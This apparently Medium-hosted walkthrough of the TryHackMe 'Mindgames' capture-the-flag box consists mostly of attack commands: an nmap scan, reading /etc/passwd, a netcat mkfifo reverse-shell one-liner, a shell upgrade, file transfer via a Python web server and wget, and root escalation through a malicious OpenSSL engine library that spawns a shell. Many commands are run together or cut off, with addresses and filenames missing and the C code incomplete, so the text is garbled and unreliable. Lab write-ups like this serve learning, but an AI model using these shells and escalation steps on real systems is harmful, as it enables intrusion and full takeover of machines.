TryHackMe | Mindgames


First thing first, we run a simple nmap scan to see which ports are open and what services are running on these ports.

nmap -sC -sV -O -oA simple_scan
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan


Open the website in browser, on visiting the web page first thing I see is brainf*ck text.

f = open("/etc/passwd", "r")
import osos.system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 7896 > /tmp/f')
python3 -c 'import pty;pty.spawn("/bin/bash")'cat user.txt

Privilege Escalation

Now we have got a stable shell lets proceed with privilege escalation. First thing first, lets transfer file to target machine. To do this first we have to create a server to host file, I am using ‘SimpleHTTPServer’ module to create a server in our local machine and to download use wget on target machine. Give appropriate privileges to the file and run it.

python -m SimpleHTTPServer 8080wget +x
#include <unistd.h>

static void init() {
execl("/bin/sh", "sh", NULL);
gcc -fPIC -o openssl.o -c openssl.c
gcc -shared -o -lcrypto openssl.o
wget +x openssl.soopenssl req -engine ./
cat /root/root.txt



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store